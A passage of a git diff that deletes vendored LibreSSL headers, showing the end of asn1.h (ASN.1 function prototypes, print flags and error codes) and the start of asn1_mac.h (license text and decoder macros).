-    int *pclass, long omax);
-int ASN1_check_infinite_end(unsigned char **p, long len);
-int ASN1_const_check_infinite_end(const unsigned char **p, long len);
-void ASN1_put_object(unsigned char **pp, int constructed, int length, int tag,
-    int xclass);
-int ASN1_put_eoc(unsigned char **pp);
-int ASN1_object_size(int constructed, int length, int tag);
-
-void *ASN1_item_dup(const ASN1_ITEM *it, void *x);
-
-#ifndef LIBRESSL_INTERNAL
-
-/* Used to implement other functions */
-void *ASN1_dup(i2d_of_void *i2d, d2i_of_void *d2i, void *x);
-
-#define ASN1_dup_of(type,i2d,d2i,x) \
-    ((type*)ASN1_dup(CHECKED_I2D_OF(type, i2d), \
-		     CHECKED_D2I_OF(type, d2i), \
-		     CHECKED_PTR_OF(type, x)))
-
-#define ASN1_dup_of_const(type,i2d,d2i,x) \
-    ((type*)ASN1_dup(CHECKED_I2D_OF(const type, i2d), \
-		     CHECKED_D2I_OF(type, d2i), \
-		     CHECKED_PTR_OF(const type, x)))
-
-/* ASN1 alloc/free macros for when a type is only used internally */
-
-#define M_ASN1_new_of(type) (type *)ASN1_item_new(ASN1_ITEM_rptr(type))
-#define M_ASN1_free_of(x, type) \
-		ASN1_item_free(CHECKED_PTR_OF(type, x), ASN1_ITEM_rptr(type))
-
-#endif /* !LIBRESSL_INTERNAL */
-
-void *ASN1_d2i_fp(void *(*xnew)(void), d2i_of_void *d2i, FILE *in, void **x);
-
-#define ASN1_d2i_fp_of(type,xnew,d2i,in,x) \
-    ((type*)ASN1_d2i_fp(CHECKED_NEW_OF(type, xnew), \
-			CHECKED_D2I_OF(type, d2i), \
-			in, \
-			CHECKED_PPTR_OF(type, x)))
-
-void *ASN1_item_d2i_fp(const ASN1_ITEM *it, FILE *in, void *x);
-int ASN1_i2d_fp(i2d_of_void *i2d, FILE *out, void *x);
-
-#define ASN1_i2d_fp_of(type,i2d,out,x) \
-    (ASN1_i2d_fp(CHECKED_I2D_OF(type, i2d), \
-		 out, \
-		 CHECKED_PTR_OF(type, x)))
-
-#define ASN1_i2d_fp_of_const(type,i2d,out,x) \
-    (ASN1_i2d_fp(CHECKED_I2D_OF(const type, i2d), \
-		 out, \
-		 CHECKED_PTR_OF(const type, x)))
-
-int ASN1_item_i2d_fp(const ASN1_ITEM *it, FILE *out, void *x);
-int ASN1_STRING_print_ex_fp(FILE *fp, ASN1_STRING *str, unsigned long flags);
-
-int ASN1_STRING_to_UTF8(unsigned char **out, ASN1_STRING *in);
-
-#ifndef OPENSSL_NO_BIO
-void *ASN1_d2i_bio(void *(*xnew)(void), d2i_of_void *d2i, BIO *in, void **x);
-
-#define ASN1_d2i_bio_of(type,xnew,d2i,in,x) \
-    ((type*)ASN1_d2i_bio( CHECKED_NEW_OF(type, xnew), \
-			  CHECKED_D2I_OF(type, d2i), \
-			  in, \
-			  CHECKED_PPTR_OF(type, x)))
-
-void *ASN1_item_d2i_bio(const ASN1_ITEM *it, BIO *in, void *x);
-int ASN1_i2d_bio(i2d_of_void *i2d, BIO *out, unsigned char *x);
-
-#define ASN1_i2d_bio_of(type,i2d,out,x) \
-    (ASN1_i2d_bio(CHECKED_I2D_OF(type, i2d), \
-		  out, \
-		  CHECKED_PTR_OF(type, x)))
-
-#define ASN1_i2d_bio_of_const(type,i2d,out,x) \
-    (ASN1_i2d_bio(CHECKED_I2D_OF(const type, i2d), \
-		  out, \
-		  CHECKED_PTR_OF(const type, x)))
-
-int ASN1_item_i2d_bio(const ASN1_ITEM *it, BIO *out, void *x);
-int ASN1_UTCTIME_print(BIO *fp, const ASN1_UTCTIME *a);
-int ASN1_GENERALIZEDTIME_print(BIO *fp, const ASN1_GENERALIZEDTIME *a);
-int ASN1_TIME_print(BIO *fp, const ASN1_TIME *a);
-int ASN1_STRING_print(BIO *bp, const ASN1_STRING *v);
-int ASN1_STRING_print_ex(BIO *out, ASN1_STRING *str, unsigned long flags);
-int ASN1_bn_print(BIO *bp, const char *number, const BIGNUM *num,
-    unsigned char *buf, int off);
-int ASN1_parse(BIO *bp, const unsigned char *pp, long len, int indent);
-int ASN1_parse_dump(BIO *bp, const unsigned char *pp, long len, int indent, int dump);
-#endif
-const char *ASN1_tag2str(int tag);
-
-/* Used to load and write netscape format cert */
-
-NETSCAPE_X509 *NETSCAPE_X509_new(void);
-void NETSCAPE_X509_free(NETSCAPE_X509 *a);
-NETSCAPE_X509 *d2i_NETSCAPE_X509(NETSCAPE_X509 **a, const unsigned char **in, long len);
-int i2d_NETSCAPE_X509(NETSCAPE_X509 *a, unsigned char **out);
-extern const ASN1_ITEM NETSCAPE_X509_it;
-
-int ASN1_UNIVERSALSTRING_to_string(ASN1_UNIVERSALSTRING *s);
-
-int ASN1_TYPE_set_octetstring(ASN1_TYPE *a, unsigned char *data, int len);
-int ASN1_TYPE_get_octetstring(ASN1_TYPE *a, unsigned char *data, int max_len);
-int ASN1_TYPE_set_int_octetstring(ASN1_TYPE *a, long num, unsigned char *data,
-    int len);
-int ASN1_TYPE_get_int_octetstring(ASN1_TYPE *a, long *num, unsigned char *data,
-    int max_len);
-
-STACK_OF(OPENSSL_BLOCK) *ASN1_seq_unpack(const unsigned char *buf, int len,
-    d2i_of_void *d2i, void (*free_func)(OPENSSL_BLOCK));
-unsigned char *ASN1_seq_pack(STACK_OF(OPENSSL_BLOCK) *safes, i2d_of_void *i2d,
-    unsigned char **buf, int *len );
-void *ASN1_unpack_string(ASN1_STRING *oct, d2i_of_void *d2i);
-void *ASN1_item_unpack(ASN1_STRING *oct, const ASN1_ITEM *it);
-ASN1_STRING *ASN1_pack_string(void *obj, i2d_of_void *i2d,
-    ASN1_OCTET_STRING **oct);
-
-ASN1_STRING *ASN1_item_pack(void *obj, const ASN1_ITEM *it,
-    ASN1_OCTET_STRING **oct);
-
-void ASN1_STRING_set_default_mask(unsigned long mask);
-int ASN1_STRING_set_default_mask_asc(const char *p);
-unsigned long ASN1_STRING_get_default_mask(void);
-int ASN1_mbstring_copy(ASN1_STRING **out, const unsigned char *in, int len,
-    int inform, unsigned long mask);
-int ASN1_mbstring_ncopy(ASN1_STRING **out, const unsigned char *in, int len,
-    int inform, unsigned long mask, long minsize, long maxsize);
-
-ASN1_STRING *ASN1_STRING_set_by_NID(ASN1_STRING **out,
-    const unsigned char *in, int inlen, int inform, int nid);
-ASN1_STRING_TABLE *ASN1_STRING_TABLE_get(int nid);
-int ASN1_STRING_TABLE_add(int, long, long, unsigned long, unsigned long);
-void ASN1_STRING_TABLE_cleanup(void);
-
-/* ASN1 template functions */
-
-/* Old API compatible functions */
-ASN1_VALUE *ASN1_item_new(const ASN1_ITEM *it);
-void ASN1_item_free(ASN1_VALUE *val, const ASN1_ITEM *it);
-ASN1_VALUE * ASN1_item_d2i(ASN1_VALUE **val, const unsigned char **in,
-    long len, const ASN1_ITEM *it);
-int ASN1_item_i2d(ASN1_VALUE *val, unsigned char **out, const ASN1_ITEM *it);
-int ASN1_item_ndef_i2d(ASN1_VALUE *val, unsigned char **out, const ASN1_ITEM *it);
-
-void ASN1_add_oid_module(void);
-
-ASN1_TYPE *ASN1_generate_nconf(char *str, CONF *nconf);
-ASN1_TYPE *ASN1_generate_v3(char *str, X509V3_CTX *cnf);
-
-/* ASN1 Print flags */
-
-/* Indicate missing OPTIONAL fields */
-#define ASN1_PCTX_FLAGS_SHOW_ABSENT		0x001
-/* Mark start and end of SEQUENCE */
-#define ASN1_PCTX_FLAGS_SHOW_SEQUENCE		0x002
-/* Mark start and end of SEQUENCE/SET OF */
-#define ASN1_PCTX_FLAGS_SHOW_SSOF		0x004
-/* Show the ASN1 type of primitives */
-#define ASN1_PCTX_FLAGS_SHOW_TYPE		0x008
-/* Don't show ASN1 type of ANY */
-#define ASN1_PCTX_FLAGS_NO_ANY_TYPE		0x010
-/* Don't show ASN1 type of MSTRINGs */
-#define ASN1_PCTX_FLAGS_NO_MSTRING_TYPE		0x020
-/* Don't show field names in SEQUENCE */
-#define ASN1_PCTX_FLAGS_NO_FIELD_NAME		0x040
-/* Show structure names of each SEQUENCE field */
-#define ASN1_PCTX_FLAGS_SHOW_FIELD_STRUCT_NAME	0x080
-/* Don't show structure name even at top level */
-#define ASN1_PCTX_FLAGS_NO_STRUCT_NAME		0x100
-
-int ASN1_item_print(BIO *out, ASN1_VALUE *ifld, int indent,
-    const ASN1_ITEM *it, const ASN1_PCTX *pctx);
-ASN1_PCTX *ASN1_PCTX_new(void);
-void ASN1_PCTX_free(ASN1_PCTX *p);
-unsigned long ASN1_PCTX_get_flags(ASN1_PCTX *p);
-void ASN1_PCTX_set_flags(ASN1_PCTX *p, unsigned long flags);
-unsigned long ASN1_PCTX_get_nm_flags(ASN1_PCTX *p);
-void ASN1_PCTX_set_nm_flags(ASN1_PCTX *p, unsigned long flags);
-unsigned long ASN1_PCTX_get_cert_flags(ASN1_PCTX *p);
-void ASN1_PCTX_set_cert_flags(ASN1_PCTX *p, unsigned long flags);
-unsigned long ASN1_PCTX_get_oid_flags(ASN1_PCTX *p);
-void ASN1_PCTX_set_oid_flags(ASN1_PCTX *p, unsigned long flags);
-unsigned long ASN1_PCTX_get_str_flags(ASN1_PCTX *p);
-void ASN1_PCTX_set_str_flags(ASN1_PCTX *p, unsigned long flags);
-
-BIO_METHOD *BIO_f_asn1(void);
-
-BIO *BIO_new_NDEF(BIO *out, ASN1_VALUE *val, const ASN1_ITEM *it);
-
-int i2d_ASN1_bio_stream(BIO *out, ASN1_VALUE *val, BIO *in, int flags,
-    const ASN1_ITEM *it);
-int PEM_write_bio_ASN1_stream(BIO *out, ASN1_VALUE *val, BIO *in, int flags,
-    const char *hdr, const ASN1_ITEM *it);
-int SMIME_write_ASN1(BIO *bio, ASN1_VALUE *val, BIO *data, int flags,
-    int ctype_nid, int econt_nid, STACK_OF(X509_ALGOR) *mdalgs,
-    const ASN1_ITEM *it);
-ASN1_VALUE *SMIME_read_ASN1(BIO *bio, BIO **bcont, const ASN1_ITEM *it);
-int SMIME_crlf_copy(BIO *in, BIO *out, int flags);
-int SMIME_text(BIO *in, BIO *out);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_ASN1_strings(void);
-
-/* Error codes for the ASN1 functions. */
-
-/* Function codes. */
-#define ASN1_F_A2D_ASN1_OBJECT				 100
-#define ASN1_F_A2I_ASN1_ENUMERATED			 101
-#define ASN1_F_A2I_ASN1_INTEGER				 102
-#define ASN1_F_A2I_ASN1_STRING				 103
-#define ASN1_F_APPEND_EXP				 176
-#define ASN1_F_ASN1_BIT_STRING_SET_BIT			 183
-#define ASN1_F_ASN1_CB					 177
-#define ASN1_F_ASN1_CHECK_TLEN				 104
-#define ASN1_F_ASN1_COLLATE_PRIMITIVE			 105
-#define ASN1_F_ASN1_COLLECT				 106
-#define ASN1_F_ASN1_D2I_EX_PRIMITIVE			 108
-#define ASN1_F_ASN1_D2I_FP				 109
-#define ASN1_F_ASN1_D2I_READ_BIO			 107
-#define ASN1_F_ASN1_DIGEST				 184
-#define ASN1_F_ASN1_DO_ADB				 110
-#define ASN1_F_ASN1_DUP					 111
-#define ASN1_F_ASN1_ENUMERATED_SET			 112
-#define ASN1_F_ASN1_ENUMERATED_TO_BN			 113
-#define ASN1_F_ASN1_EX_C2I				 204
-#define ASN1_F_ASN1_FIND_END				 190
-#define ASN1_F_ASN1_GENERALIZEDTIME_ADJ			 216
-#define ASN1_F_ASN1_GENERALIZEDTIME_SET			 185
-#define ASN1_F_ASN1_GENERATE_V3				 178
-#define ASN1_F_ASN1_GET_OBJECT				 114
-#define ASN1_F_ASN1_HEADER_NEW				 115
-#define ASN1_F_ASN1_I2D_BIO				 116
-#define ASN1_F_ASN1_I2D_FP				 117
-#define ASN1_F_ASN1_INTEGER_SET				 118
-#define ASN1_F_ASN1_INTEGER_TO_BN			 119
-#define ASN1_F_ASN1_ITEM_D2I_FP				 206
-#define ASN1_F_ASN1_ITEM_DUP				 191
-#define ASN1_F_ASN1_ITEM_EX_COMBINE_NEW			 121
-#define ASN1_F_ASN1_ITEM_EX_D2I				 120
-#define ASN1_F_ASN1_ITEM_I2D_BIO			 192
-#define ASN1_F_ASN1_ITEM_I2D_FP				 193
-#define ASN1_F_ASN1_ITEM_PACK				 198
-#define ASN1_F_ASN1_ITEM_SIGN				 195
-#define ASN1_F_ASN1_ITEM_SIGN_CTX			 220
-#define ASN1_F_ASN1_ITEM_UNPACK				 199
-#define ASN1_F_ASN1_ITEM_VERIFY				 197
-#define ASN1_F_ASN1_MBSTRING_NCOPY			 122
-#define ASN1_F_ASN1_OBJECT_NEW				 123
-#define ASN1_F_ASN1_OUTPUT_DATA				 214
-#define ASN1_F_ASN1_PACK_STRING				 124
-#define ASN1_F_ASN1_PCTX_NEW				 205
-#define ASN1_F_ASN1_PKCS5_PBE_SET			 125
-#define ASN1_F_ASN1_SEQ_PACK				 126
-#define ASN1_F_ASN1_SEQ_UNPACK				 127
-#define ASN1_F_ASN1_SIGN				 128
-#define ASN1_F_ASN1_STR2TYPE				 179
-#define ASN1_F_ASN1_STRING_SET				 186
-#define ASN1_F_ASN1_STRING_TABLE_ADD			 129
-#define ASN1_F_ASN1_STRING_TYPE_NEW			 130
-#define ASN1_F_ASN1_TEMPLATE_EX_D2I			 132
-#define ASN1_F_ASN1_TEMPLATE_NEW			 133
-#define ASN1_F_ASN1_TEMPLATE_NOEXP_D2I			 131
-#define ASN1_F_ASN1_TIME_ADJ				 217
-#define ASN1_F_ASN1_TIME_SET				 175
-#define ASN1_F_ASN1_TYPE_GET_INT_OCTETSTRING		 134
-#define ASN1_F_ASN1_TYPE_GET_OCTETSTRING		 135
-#define ASN1_F_ASN1_UNPACK_STRING			 136
-#define ASN1_F_ASN1_UTCTIME_ADJ				 218
-#define ASN1_F_ASN1_UTCTIME_SET				 187
-#define ASN1_F_ASN1_VERIFY				 137
-#define ASN1_F_B64_READ_ASN1				 209
-#define ASN1_F_B64_WRITE_ASN1				 210
-#define ASN1_F_BIO_NEW_NDEF				 208
-#define ASN1_F_BITSTR_CB				 180
-#define ASN1_F_BN_TO_ASN1_ENUMERATED			 138
-#define ASN1_F_BN_TO_ASN1_INTEGER			 139
-#define ASN1_F_C2I_ASN1_BIT_STRING			 189
-#define ASN1_F_C2I_ASN1_INTEGER				 194
-#define ASN1_F_C2I_ASN1_OBJECT				 196
-#define ASN1_F_COLLECT_DATA				 140
-#define ASN1_F_D2I_ASN1_BIT_STRING			 141
-#define ASN1_F_D2I_ASN1_BOOLEAN				 142
-#define ASN1_F_D2I_ASN1_BYTES				 143
-#define ASN1_F_D2I_ASN1_GENERALIZEDTIME			 144
-#define ASN1_F_D2I_ASN1_HEADER				 145
-#define ASN1_F_D2I_ASN1_INTEGER				 146
-#define ASN1_F_D2I_ASN1_OBJECT				 147
-#define ASN1_F_D2I_ASN1_SET				 148
-#define ASN1_F_D2I_ASN1_TYPE_BYTES			 149
-#define ASN1_F_D2I_ASN1_UINTEGER			 150
-#define ASN1_F_D2I_ASN1_UTCTIME				 151
-#define ASN1_F_D2I_AUTOPRIVATEKEY			 207
-#define ASN1_F_D2I_NETSCAPE_RSA				 152
-#define ASN1_F_D2I_NETSCAPE_RSA_2			 153
-#define ASN1_F_D2I_PRIVATEKEY				 154
-#define ASN1_F_D2I_PUBLICKEY				 155
-#define ASN1_F_D2I_RSA_NET				 200
-#define ASN1_F_D2I_RSA_NET_2				 201
-#define ASN1_F_D2I_X509					 156
-#define ASN1_F_D2I_X509_CINF				 157
-#define ASN1_F_D2I_X509_PKEY				 159
-#define ASN1_F_I2D_ASN1_BIO_STREAM			 211
-#define ASN1_F_I2D_ASN1_SET				 188
-#define ASN1_F_I2D_ASN1_TIME				 160
-#define ASN1_F_I2D_DSA_PUBKEY				 161
-#define ASN1_F_I2D_EC_PUBKEY				 181
-#define ASN1_F_I2D_PRIVATEKEY				 163
-#define ASN1_F_I2D_PUBLICKEY				 164
-#define ASN1_F_I2D_RSA_NET				 162
-#define ASN1_F_I2D_RSA_PUBKEY				 165
-#define ASN1_F_LONG_C2I					 166
-#define ASN1_F_OID_MODULE_INIT				 174
-#define ASN1_F_PARSE_TAGGING				 182
-#define ASN1_F_PKCS5_PBE2_SET_IV			 167
-#define ASN1_F_PKCS5_PBE_SET				 202
-#define ASN1_F_PKCS5_PBE_SET0_ALGOR			 215
-#define ASN1_F_PKCS5_PBKDF2_SET				 219
-#define ASN1_F_SMIME_READ_ASN1				 212
-#define ASN1_F_SMIME_TEXT				 213
-#define ASN1_F_X509_CINF_NEW				 168
-#define ASN1_F_X509_CRL_ADD0_REVOKED			 169
-#define ASN1_F_X509_INFO_NEW				 170
-#define ASN1_F_X509_NAME_ENCODE				 203
-#define ASN1_F_X509_NAME_EX_D2I				 158
-#define ASN1_F_X509_NAME_EX_NEW				 171
-#define ASN1_F_X509_NEW					 172
-#define ASN1_F_X509_PKEY_NEW				 173
-
-/* Reason codes. */
-#define ASN1_R_ADDING_OBJECT				 171
-#define ASN1_R_ASN1_PARSE_ERROR				 203
-#define ASN1_R_ASN1_SIG_PARSE_ERROR			 204
-#define ASN1_R_AUX_ERROR				 100
-#define ASN1_R_BAD_CLASS				 101
-#define ASN1_R_BAD_OBJECT_HEADER			 102
-#define ASN1_R_BAD_PASSWORD_READ			 103
-#define ASN1_R_BAD_TAG					 104
-#define ASN1_R_BMPSTRING_IS_WRONG_LENGTH		 214
-#define ASN1_R_BN_LIB					 105
-#define ASN1_R_BOOLEAN_IS_WRONG_LENGTH			 106
-#define ASN1_R_BUFFER_TOO_SMALL				 107
-#define ASN1_R_CIPHER_HAS_NO_OBJECT_IDENTIFIER		 108
-#define ASN1_R_CONTEXT_NOT_INITIALISED			 217
-#define ASN1_R_DATA_IS_WRONG				 109
-#define ASN1_R_DECODE_ERROR				 110
-#define ASN1_R_DECODING_ERROR				 111
-#define ASN1_R_DEPTH_EXCEEDED				 174
-#define ASN1_R_DIGEST_AND_KEY_TYPE_NOT_SUPPORTED	 198
-#define ASN1_R_ENCODE_ERROR				 112
-#define ASN1_R_ERROR_GETTING_TIME			 173
-#define ASN1_R_ERROR_LOADING_SECTION			 172
-#define ASN1_R_ERROR_PARSING_SET_ELEMENT		 113
-#define ASN1_R_ERROR_SETTING_CIPHER_PARAMS		 114
-#define ASN1_R_EXPECTING_AN_INTEGER			 115
-#define ASN1_R_EXPECTING_AN_OBJECT			 116
-#define ASN1_R_EXPECTING_A_BOOLEAN			 117
-#define ASN1_R_EXPECTING_A_TIME				 118
-#define ASN1_R_EXPLICIT_LENGTH_MISMATCH			 119
-#define ASN1_R_EXPLICIT_TAG_NOT_CONSTRUCTED		 120
-#define ASN1_R_FIELD_MISSING				 121
-#define ASN1_R_FIRST_NUM_TOO_LARGE			 122
-#define ASN1_R_HEADER_TOO_LONG				 123
-#define ASN1_R_ILLEGAL_BITSTRING_FORMAT			 175
-#define ASN1_R_ILLEGAL_BOOLEAN				 176
-#define ASN1_R_ILLEGAL_CHARACTERS			 124
-#define ASN1_R_ILLEGAL_FORMAT				 177
-#define ASN1_R_ILLEGAL_HEX				 178
-#define ASN1_R_ILLEGAL_IMPLICIT_TAG			 179
-#define ASN1_R_ILLEGAL_INTEGER				 180
-#define ASN1_R_ILLEGAL_NESTED_TAGGING			 181
-#define ASN1_R_ILLEGAL_NULL				 125
-#define ASN1_R_ILLEGAL_NULL_VALUE			 182
-#define ASN1_R_ILLEGAL_OBJECT				 183
-#define ASN1_R_ILLEGAL_OPTIONAL_ANY			 126
-#define ASN1_R_ILLEGAL_OPTIONS_ON_ITEM_TEMPLATE		 170
-#define ASN1_R_ILLEGAL_TAGGED_ANY			 127
-#define ASN1_R_ILLEGAL_TIME_VALUE			 184
-#define ASN1_R_INTEGER_NOT_ASCII_FORMAT			 185
-#define ASN1_R_INTEGER_TOO_LARGE_FOR_LONG		 128
-#define ASN1_R_INVALID_BIT_STRING_BITS_LEFT		 220
-#define ASN1_R_INVALID_BMPSTRING_LENGTH			 129
-#define ASN1_R_INVALID_DIGIT				 130
-#define ASN1_R_INVALID_MIME_TYPE			 205
-#define ASN1_R_INVALID_MODIFIER				 186
-#define ASN1_R_INVALID_NUMBER				 187
-#define ASN1_R_INVALID_OBJECT_ENCODING			 216
-#define ASN1_R_INVALID_SEPARATOR			 131
-#define ASN1_R_INVALID_TIME_FORMAT			 132
-#define ASN1_R_INVALID_UNIVERSALSTRING_LENGTH		 133
-#define ASN1_R_INVALID_UTF8STRING			 134
-#define ASN1_R_IV_TOO_LARGE				 135
-#define ASN1_R_LENGTH_ERROR				 136
-#define ASN1_R_LIST_ERROR				 188
-#define ASN1_R_MIME_NO_CONTENT_TYPE			 206
-#define ASN1_R_MIME_PARSE_ERROR				 207
-#define ASN1_R_MIME_SIG_PARSE_ERROR			 208
-#define ASN1_R_MISSING_EOC				 137
-#define ASN1_R_MISSING_SECOND_NUMBER			 138
-#define ASN1_R_MISSING_VALUE				 189
-#define ASN1_R_MSTRING_NOT_UNIVERSAL			 139
-#define ASN1_R_MSTRING_WRONG_TAG			 140
-#define ASN1_R_NESTED_ASN1_STRING			 197
-#define ASN1_R_NON_HEX_CHARACTERS			 141
-#define ASN1_R_NOT_ASCII_FORMAT				 190
-#define ASN1_R_NOT_ENOUGH_DATA				 142
-#define ASN1_R_NO_CONTENT_TYPE				 209
-#define ASN1_R_NO_DEFAULT_DIGEST			 201
-#define ASN1_R_NO_MATCHING_CHOICE_TYPE			 143
-#define ASN1_R_NO_MULTIPART_BODY_FAILURE		 210
-#define ASN1_R_NO_MULTIPART_BOUNDARY			 211
-#define ASN1_R_NO_SIG_CONTENT_TYPE			 212
-#define ASN1_R_NULL_IS_WRONG_LENGTH			 144
-#define ASN1_R_OBJECT_NOT_ASCII_FORMAT			 191
-#define ASN1_R_ODD_NUMBER_OF_CHARS			 145
-#define ASN1_R_PRIVATE_KEY_HEADER_MISSING		 146
-#define ASN1_R_SECOND_NUMBER_TOO_LARGE			 147
-#define ASN1_R_SEQUENCE_LENGTH_MISMATCH			 148
-#define ASN1_R_SEQUENCE_NOT_CONSTRUCTED			 149
-#define ASN1_R_SEQUENCE_OR_SET_NEEDS_CONFIG		 192
-#define ASN1_R_SHORT_LINE				 150
-#define ASN1_R_SIG_INVALID_MIME_TYPE			 213
-#define ASN1_R_STREAMING_NOT_SUPPORTED			 202
-#define ASN1_R_STRING_TOO_LONG				 151
-#define ASN1_R_STRING_TOO_SHORT				 152
-#define ASN1_R_TAG_VALUE_TOO_HIGH			 153
-#define ASN1_R_THE_ASN1_OBJECT_IDENTIFIER_IS_NOT_KNOWN_FOR_THIS_MD 154
-#define ASN1_R_TIME_NOT_ASCII_FORMAT			 193
-#define ASN1_R_TOO_LONG					 155
-#define ASN1_R_TYPE_NOT_CONSTRUCTED			 156
-#define ASN1_R_UNABLE_TO_DECODE_RSA_KEY			 157
-#define ASN1_R_UNABLE_TO_DECODE_RSA_PRIVATE_KEY		 158
-#define ASN1_R_UNEXPECTED_EOC				 159
-#define ASN1_R_UNIVERSALSTRING_IS_WRONG_LENGTH		 215
-#define ASN1_R_UNKNOWN_FORMAT				 160
-#define ASN1_R_UNKNOWN_MESSAGE_DIGEST_ALGORITHM		 161
-#define ASN1_R_UNKNOWN_OBJECT_TYPE			 162
-#define ASN1_R_UNKNOWN_PUBLIC_KEY_TYPE			 163
-#define ASN1_R_UNKNOWN_SIGNATURE_ALGORITHM		 199
-#define ASN1_R_UNKNOWN_TAG				 194
-#define ASN1_R_UNKOWN_FORMAT				 195
-#define ASN1_R_UNSUPPORTED_ANY_DEFINED_BY_TYPE		 164
-#define ASN1_R_UNSUPPORTED_CIPHER			 165
-#define ASN1_R_UNSUPPORTED_ENCRYPTION_ALGORITHM		 166
-#define ASN1_R_UNSUPPORTED_PUBLIC_KEY_TYPE		 167
-#define ASN1_R_UNSUPPORTED_TYPE				 196
-#define ASN1_R_WRONG_PUBLIC_KEY_TYPE			 200
-#define ASN1_R_WRONG_TAG				 168
-#define ASN1_R_WRONG_TYPE				 169
-
-
-int ASN1_time_parse(const char *_bytes, size_t _len, struct tm *_tm, int _mode);
-int ASN1_time_tm_cmp(struct tm *_tm1, struct tm *_tm2);
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/asn1_mac.h b/thirdparty/libressl/include/openssl/asn1_mac.h
deleted file mode 100644
index fd524dc..0000000
--- a/thirdparty/libressl/include/openssl/asn1_mac.h
+++ /dev/null
@@ -1,426 +0,0 @@
-/* $OpenBSD: asn1_mac.h,v 1.14 2014/06/27 04:41:09 miod Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_ASN1_MAC_H
-#define HEADER_ASN1_MAC_H
-
-#include <openssl/asn1.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-#ifndef ASN1_MAC_ERR_LIB
-#define ASN1_MAC_ERR_LIB	ERR_LIB_ASN1
-#endif
-
-#define ASN1_MAC_H_err(f,r,line) \
-	ERR_PUT_error(ASN1_MAC_ERR_LIB,(f),(r),__FILE__,(line))
-
-#define M_ASN1_D2I_vars(a,type,func) \
-	ASN1_const_CTX c; \
-	type ret=NULL; \
-	\
-	c.pp=(const unsigned char **)pp; \
-	c.q= *(const unsigned char **)pp; \
-	c.error=ERR_R_NESTED_ASN1_ERROR; \
-	if ((a == NULL) || ((*a) == NULL)) \
-		{ if ((ret=(type)func()) == NULL) \
-			{ c.line=__LINE__; goto err; } } \
-	else	ret=(*a);
-
-#define M_ASN1_D2I_Init() \
-	c.p= *(const unsigned char **)pp; \
-	c.max=(length == 0)?0:(c.p+length);
-
-#define M_ASN1_D2I_Finish_2(a) \
-	if (!asn1_const_Finish(&c)) \
-		{ c.line=__LINE__; goto err; } \
-	*(const unsigned char **)pp=c.p; \
-	if (a != NULL) (*a)=ret; \
-	return(ret);
-
-#define M_ASN1_D2I_Finish(a,func,e) \
-	M_ASN1_D2I_Finish_2(a); \
-err:\
-	ASN1_MAC_H_err((e),c.error,c.line); \
-	asn1_add_error(*(const unsigned char **)pp,(int)(c.q- *pp)); \
-	if ((ret != NULL) && ((a == NULL) || (*a != ret))) func(ret); \
-	return(NULL)
-
-#define M_ASN1_D2I_start_sequence() \
-	if (!asn1_GetSequence(&c,&length)) \
-		{ c.line=__LINE__; goto err; }
-/* Begin reading ASN1 without a surrounding sequence */
-#define M_ASN1_D2I_begin() \
-	c.slen = length;
-
-/* End reading ASN1 with no check on length */
-#define M_ASN1_D2I_Finish_nolen(a, func, e) \
-	*pp=c.p; \
-	if (a != NULL) (*a)=ret; \
-	return(ret); \
-err:\
-	ASN1_MAC_H_err((e),c.error,c.line); \
-	asn1_add_error(*pp,(int)(c.q- *pp)); \
-	if ((ret != NULL) && ((a == NULL) || (*a != ret))) func(ret); \
-	return(NULL)
-
-#define M_ASN1_D2I_end_sequence() \
-	(((c.inf&1) == 0)?(c.slen <= 0): \
-		(c.eos=ASN1_const_check_infinite_end(&c.p,c.slen)))
-
